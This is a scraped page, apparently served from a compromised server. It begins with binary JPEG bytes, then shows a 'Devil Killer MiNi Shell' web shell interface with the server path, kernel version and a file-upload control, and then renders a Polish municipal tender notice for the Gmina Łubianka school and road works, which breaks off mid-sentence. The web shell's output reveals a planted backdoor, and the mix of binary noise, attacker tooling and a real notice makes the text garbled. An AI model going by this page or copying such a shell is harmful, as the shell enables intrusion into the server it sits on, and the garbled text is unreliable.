JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250227/0012372301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja obiektów zaopatrzenia w wodę, infrastruktury drogowej, oświatowej oraz montaż pompy ciepła na terenie Gminy Łubianka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Łubianka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118721</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Jana Pawła II 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łubianka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-152</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">56 678 82 17</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@lubianka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lubianka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja obiektów zaopatrzenia w wodę, infrastruktury drogowej, oświatowej oraz montaż pompy ciepła na terenie Gminy Łubianka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0881bd8d-dbeb-4ff9-8bb4-b543dd3fd376</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00123723</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00032864/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Modernizacja obiektów zaopatrzenia w wodę, infrastruktury drogowej, oświatowej oraz montaż pompy ciepła na terenie Gminy Łubianka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_lubianka <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu: Platformy Zakupowej https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu: Platformy Zakupowej https://platformazakupowa.pl.<br/>2. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>• Pan Mirosław Jakubski (zagadnienia merytoryczne),<br/>• Pan Marcin Szymeczko (zagadnienia proceduralne).<br/>3. W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a wykonawcami w zakresie:<br/>- przesyłania Zamawiającemu pytań do treści SWZ;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia oświadczenia, o którym mowa w art. 125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>- przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>- przesyłania odwołania/inne<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. <br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>[...] Więcej informacji w Rozdziale 17 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Łubianka z siedzibą mieszczącą się pod adresem: Aleja Jana Pawła II 8, 87-152 Łubianka, tel. 56 678 82 17 lub 56 678 82 18, zwanego dalej „Administratorem” lub „Zamawiającym”.<br/>2. Administrator powołał Inspektora Ochrony Danych. Ma Pani/Pan prawo do skontaktowania się z nim poprzez wysłanie wiadomości elektronicznej na adres: iod@lubianka.pl lub wysyłając korespondencję na adres: Inspektor Ochrony Danych w Gminie Łubianka, Aleja Jana Pawła II 8, 87-152 Łubianka.<br/>3. Pani/Pana dane osobowe będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego na „Modernizacja obiektów zaopatrzenia w wodę, infrastruktury drogowej, oświatowej oraz montaż pompy ciepła na terenie Gminy Łubianka”.<br/>4. Pani/Pana danych osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit c) RODO – jako niezbędne do wypełnienia obowiązku prawnego ciążącego na Administratorze na mocy przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t. j. Dz. U. z 2023 r., poz. 1605 z późn. zm.), ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. z 2021 r., poz. 305 ze zm.) oraz innych przepisów prawa.<br/>[...] Więcej informacji w Rozdziale 3 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.271.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: Przebudowa systemu ogrzewania Szkoły Podstawowej w Pigży<br/>Zakres prac obejmuje m.in.:<br/>• wykonanie 24 szt. otworów montażowych kolektorów pionowych o głębokości 160 m każdy;<br/>• montaż 2 szt. pomp ciepła typu solanka woda o łącznej mocy 150 kW wraz z technologią instalacji źródła ciepła;<br/>• wymiana instalacji c.o w całym budynku szkoły;<br/>• demontaż istniejącej kotłowni oraz istniejącej instalacji c.o.<br/>• modernizacja istniejącego boiska szkolnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-04-01 do 2025-08-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W przedmiotowym postępowaniu przy wyborze oferty najkorzystniejszej Zamawiający, zastosuje następujące kryteria oceny ofert:<br/>1) Cena (C) – Waga 60 pkt.,<br/>2) Gwarancja (G) – Waga 40 pkt.<br/>2. Zamawiający dokona oceny ofert, zgodnie z następującymi zasadami, przyjmując, że 1%=1pkt.:<br/>1) Kryterium „Cena” (C)<br/>W tym kryterium punkty zostaną przyznane na podstawie podanej przez wykonawcę w ofercie ceny brutto wykonania przedmiotu zamówienia. Ocena punktowa w ramach kryterium ceny zostanie dokonana zgodnie z poniższym wzorem:<br/>C=Cmin/Cbad × 100pkt × 60% <br/>Gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium „cena” <br/>Cmin – najniższa cena całkowita spośród badanych ofert<br/>Cbad – cena całkowita oferty badanej<br/>2) Kryterium „Gwarancja” (G)<br/>W ramach niniejszego kryterium oferty zostaną ocenione w stosunku do wskazanego przez Wykonawcę w formularzu oferty okresu gwarancji na przedmiot zamówienia. Punkty zostaną przyznane według informacji wskazanych w poniżej:<br/>Okres gwarancji liczony od dnia podpisania protokołu końcowego bez zastrzeżeń Liczba punktów<br/>36 miesięcy - 0 pkt<br/>48 miesięcy - 20 pkt<br/>60 miesięcy - 40 pkt<br/>3. Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania niniejszej SWZ oraz otrzyma największą ilość punktów po zsumowaniu liczby punktów uzyskanych w określonych kryteriach, przy zastosowaniu wzoru:<br/>P=C+G<br/>Gdzie:<br/>P - całkowita liczba punktów przyznana ofercie<br/>C - liczba punktów przyznanych ofercie w kryterium „cena”<br/>G - liczba punktów przyznanych ofercie w kryterium „gwarancja”<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>7. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Remont pokrycia dachowego budynku Szkoły Podstawowej w Wybczu<br/>Zakres prac obejmuje m.in.:<br/>• rozbiórkę istniejącego pokrycia z dachówki;<br/>• rozbiórkę rynien, rur spustowych oraz obróbek blacharskich;<br/>• rozbiórkę łat, kontrłat i membrany;<br/>• konserwację całej więźby dachowej;<br/>• ułożenie nowej membrany;<br/>• montaż nowych łat i kontrłat;<br/>• ułożenie nowego pokrycia z dachówki ceramicznej;<br/>• wykonanie nowego orynnowania;<br/>• wykonanie nowej instalacji odgromowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-02 do 2025-08-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W przedmiotowym postępowaniu przy wyborze oferty najkorzystniejszej Zamawiający, zastosuje następujące kryteria oceny ofert:<br/>1) Cena (C) – Waga 60 pkt.,<br/>2) Gwarancja (G) – Waga 40 pkt.<br/>2. Zamawiający dokona oceny ofert, zgodnie z następującymi zasadami, przyjmując, że 1%=1pkt.:<br/>1) Kryterium „Cena” (C)<br/>W tym kryterium punkty zostaną przyznane na podstawie podanej przez wykonawcę w ofercie ceny brutto wykonania przedmiotu zamówienia. Ocena punktowa w ramach kryterium ceny zostanie dokonana zgodnie z poniższym wzorem:<br/>C=Cmin/Cbad × 100pkt × 60% <br/>Gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium „cena” <br/>Cmin – najniższa cena całkowita spośród badanych ofert<br/>Cbad – cena całkowita oferty badanej<br/>2) Kryterium „Gwarancja” (G)<br/>W ramach niniejszego kryterium oferty zostaną ocenione w stosunku do wskazanego przez Wykonawcę w formularzu oferty okresu gwarancji na przedmiot zamówienia. Punkty zostaną przyznane według informacji wskazanych w poniżej:<br/>Okres gwarancji liczony od dnia podpisania protokołu końcowego bez zastrzeżeń Liczba punktów<br/>36 miesięcy - 0 pkt<br/>48 miesięcy - 20 pkt<br/>60 miesięcy - 40 pkt<br/>3. Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania niniejszej SWZ oraz otrzyma największą ilość punktów po zsumowaniu liczby punktów uzyskanych w określonych kryteriach, przy zastosowaniu wzoru:<br/>P=C+G<br/>Gdzie:<br/>P - całkowita liczba punktów przyznana ofercie<br/>C - liczba punktów przyznanych ofercie w kryterium „cena”<br/>G - liczba punktów przyznanych ofercie w kryterium „gwarancja”<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>7. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3: Przebudowa ul. Mostowej w Pigży<br/>Zakres prac obejmuje m.in.:<br/>• budowę tymczasowej drogi dojazdowej do ul. Księżycowej o nawierzchni z gruzu betonowego zgodnie z załączonym szkicem;<br/>• rozbiórka istniejącego wiaduktu;<br/>• wykonanie żelbetonowej konstrukcji prefabrykowanej;<br/>• wykonanie ścian oporowych w technologii gruntu zbrojonego;<br/>• wykonanie ścian żelbetonowych utwardzonych w ławie fundamentowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-04-01 do 2025-07-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W przedmiotowym postępowaniu przy wyborze oferty najkorzystniejszej Zamawiający, zastosuje następujące kryteria oceny ofert:<br/>1) Cena (C) – Waga 60 pkt.,<br/>2) Gwarancja (G) – Waga 40 pkt.<br/>2. Zamawiający dokona oceny ofert, zgodnie z następującymi zasadami, przyjmując, że 1%=1pkt.:<br/>1) Kryterium „Cena” (C)<br/>W tym kryterium punkty zostaną przyznane na podstawie podanej przez wykonawcę w ofercie ceny brutto wykonania przedmiotu zamówienia. Ocena punktowa w ramach kryterium ceny zostanie dokonana zgodnie z poniższym wzorem:<br/>C=Cmin/Cbad × 100pkt × 60% <br/>Gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium „cena” <br/>Cmin – najniższa cena całkowita spośród badanych ofert<br/>Cbad – cena całkowita oferty badanej<br/>2) Kryterium „Gwarancja” (G)<br/>W ramach niniejszego kryterium oferty zostaną ocenione w stosunku do wskazanego przez Wykonawcę w formularzu oferty okresu gwarancji na przedmiot zamówienia. Punkty zostaną przyznane według informacji wskazanych w poniżej:<br/>Okres gwarancji liczony od dnia podpisania protokołu końcowego bez zastrzeżeń Liczba punktów<br/>36 miesięcy - 0 pkt<br/>48 miesięcy - 20 pkt<br/>60 miesięcy - 40 pkt<br/>3. Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania niniejszej SWZ oraz otrzyma największą ilość punktów po zsumowaniu liczby punktów uzyskanych w określonych kryteriach, przy zastosowaniu wzoru:<br/>P=C+G<br/>Gdzie:<br/>P - całkowita liczba punktów przyznana ofercie<br/>C - liczba punktów przyznanych ofercie w kryterium „cena”<br/>G - liczba punktów przyznanych ofercie w kryterium „gwarancja”<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Jeżeli oferty otrzymały taką samą ocenę w 